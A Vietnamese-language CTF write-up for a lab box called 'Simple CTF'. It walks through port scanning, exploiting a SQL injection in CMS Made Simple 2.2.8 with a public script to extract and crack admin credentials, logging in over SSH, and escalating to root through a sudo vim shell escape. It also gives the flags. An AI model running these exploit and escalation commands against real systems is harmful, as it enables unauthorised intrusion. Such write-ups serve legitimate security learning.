Quartz 🪬

Search

SearchSearch

Simple CTF

Nov 21, 20245 min read

Recon

Nmap

# Nmap 7.95 scan initiated Tue Oct 15 22:27:53 2024 as: nmap -A -T3 -oN nmap.log -p 1-1000 10.10.8.158
Nmap scan report for 10.10.8.158
Host is up (0.26s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.11.79.35
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 2 disallowed entries 
|_/ /openemr-5_0_1_3 
Service Info: OS: Unix
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Oct 15 22:28:48 2024 -- 1 IP address (1 host up) scanned in 55.59 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-15 22:42 +07
Stats: 0:01:12 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 22.88% done; ETC: 22:48 (0:04:06 remaining)
Nmap scan report for 10.10.8.158
Host is up (0.25s latency).
Not shown: 3999 filtered tcp ports (no-response)
PORT     STATE SERVICE
2222/tcp open  EtherNetIP-1
 
Nmap done: 1 IP address (1 host up) scanned in 99.80 seconds

Nuclei

[INF] Your current nuclei-templates v10.0.1 are outdated. Latest is v10.0.2
[INF] Successfully updated nuclei-templates (v10.0.2) to /home/aleister/nuclei-templates. GoodLuck!
[INF] Current nuclei version: v3.3.4 (latest)
[INF] Current nuclei-templates version: v10.0.2 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 68
[INF] Templates loaded for current scan: 8689
[INF] Executing 8490 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 199 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1623 (Reduced 1532 Requests)
[INF] Using Interactsh Server: oast.site
[waf-detect:apachegeneric] [http] [info] http://10.10.8.158
[ftp-anonymous-login] [tcp] [medium] 10.10.8.158:21
[http-missing-security-headers:strict-transport-security] [http] [info] http://10.10.8.158
[http-missing-security-headers:content-security-policy] [http] [info] http://10.10.8.158
[http-missing-security-headers:permissions-policy] [http] [info] http://10.10.8.158
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://10.10.8.158
[http-missing-security-headers:clear-site-data] [http] [info] http://10.10.8.158
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://10.10.8.158
[http-missing-security-headers:x-frame-options] [http] [info] http://10.10.8.158
[http-missing-security-headers:x-content-type-options] [http] [info] http://10.10.8.158
[http-missing-security-headers:referrer-policy] [http] [info] http://10.10.8.158
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://10.10.8.158
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://10.10.8.158
[robots-txt] [http] [info] http://10.10.8.158/robots.txt
[apache-detect] [http] [info] http://10.10.8.158 ["Apache/2.4.18 (Ubuntu)"]
[default-apache-test-all] [http] [info] http://10.10.8.158 ["Apache/2.4.18 (Ubuntu)"]
[default-apache2-ubuntu-page] [http] [info] http://10.10.8.158
[options-method] [http] [info] http://10.10.8.158 ["GET,HEAD,POST,OPTIONS"]
[robots-txt-endpoint] [http] [info] http://10.10.8.158/robots.txt

Analysis

SSH Port

Port 2222 thật ra là của SSH, biết được thông qua request sau:

GET / HTTP/1.1
Host: 10.10.8.158:2222
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: CMSSESSIDd6a5f2400115=rv9dnkb31ekgdjicb9k4ebq0l4
Connection: keep-alive
 
 
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8

Redirection

Do là Apache Server nên có thể có việc redirect từ /endpoint đến /endpoint/. Tìm được một endpoint có hành vi này:

GET /simple/modules HTTP/1.1
Host: 10.10.8.158
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: CMSSESSIDd6a5f2400115=rv9dnkb31ekgdjicb9k4ebq0l4
Connection: keep-alive
 
 
HTTP/1.1 301 Moved Permanently
Date: Tue, 15 Oct 2024 16:08:12 GMT
Server: Apache/2.4.18 (Ubuntu)
Location: http://10.10.8.158/simple/modules/
Content-Length: 319
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

Misconfiguration

Response của http://10.10.8.158/simple/modules/ cũng tồn tại một lỗi cấu hình sai khiến cho nó liệt kê một thư mục:

Made Simple CMS Framework

Endpoint /simple được xây dựng từ Made Simple CMS framework. Phiên bản của nó là 2.2.8 và tồn tại một lỗ hổng SQL Injection (CVE-2019-9053) cho phiên bản này: CMS Made Simple < 2.2.10 - SQL Injection - PHP webapps Exploit.

Exploit

Tải về script khai thác từ ExploitDB và chạy với Python 2 để trích xuất thông tin xác thực từ cơ sở dữ liệu:

python exploit.py -u http://<IP>/simple
 
[+] Salt for password found: 156e5u9y2061c419yg2
[+] Username found: q50351
[+] Email found: adsU8A0
[+] Password found: 0c01f4468b4hyn

Trông có vẻ như không phải là mật khẩu.

Lý do có thể là vì không chạy script trên với tùy chọn crack password hash. Thử lại:

python sql-injection.py -u http://10.10.8.158/simple -c -w /usr/share/wordlists/rockyou.txt
 
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admi1
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret

Sử dụng thông tin xác thực trên để đăng nhập thông qua SSH:

ssh mitch@10.10.8.158 -p 2222
mitch@10.10.8.158's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
0 packages can be updated.
0 updates are security updates.
 
Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$

Im in!

$ cat user.txt
G00d j0b, keep up!

Escalate

Thực hiện thăm dò một chút:

$ pwd
/home/mitch
$ cd ..
$ ls
mitch  sunbath
$ sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

May mắn thay, vim có thể được lợi dụng để leo lên root nếu ta có quyền chạy nó với sudo:

sudo vim -c ':!/bin/sh'

Leo lên root thành công:

:!/bin/sh
# whoami                             
root

Lấy flag:

# cd /root
# ls
root.txt
# cat root.txt  
W3ll d0n3. You made it!

Flag(s)

User: G00d j0b, keep up!
Root: W3ll d0n3. You made it!

References

Backlinks